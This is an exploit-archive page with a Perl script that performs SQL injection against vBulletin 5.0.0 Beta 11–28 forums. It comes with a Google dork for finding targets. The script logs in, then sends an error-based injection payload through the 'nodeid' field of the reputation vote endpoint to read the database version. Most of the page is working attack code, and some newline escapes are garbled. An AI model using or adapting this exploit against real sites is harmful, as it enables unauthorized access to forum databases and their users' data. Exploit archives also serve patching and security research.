vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection
# Published : 2013-03-25
# Author :
# Previous Title : AContent 1.3 - Local File Inclusion
# Next Title : Flatnux CMS 2013-01.17 (index.php, theme param) - Local File Inclusion

# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin? Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link: 
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";
 
if (@ARGV != 5) {
    print "rnUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUMrn";
    exit;
}
 
$host		= $ARGV[0];
$path		= $ARGV[1];
$username	= $ARGV[2];
$password	= $ARGV[3];
$magicnum	= $ARGV[4];
$encpath	= encode_base64('http://'.$host.$path);
print "[+] Loggingn";
print "[+] Username: ".$username."n";
print "[+] Password: ".$password."n";
print "[+] MagicNum: ".$magicnum."n";
print "[+] " .$host.$path."auth/loginn";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
		'url' => $encpath,
		'username' => $username,
		'password' => $password,
	],
	Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requestingn";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
		'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
	],
	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\.)|[^\#])*#)/) { print '[+] Version: '.$1 };
print "n";
exit 1;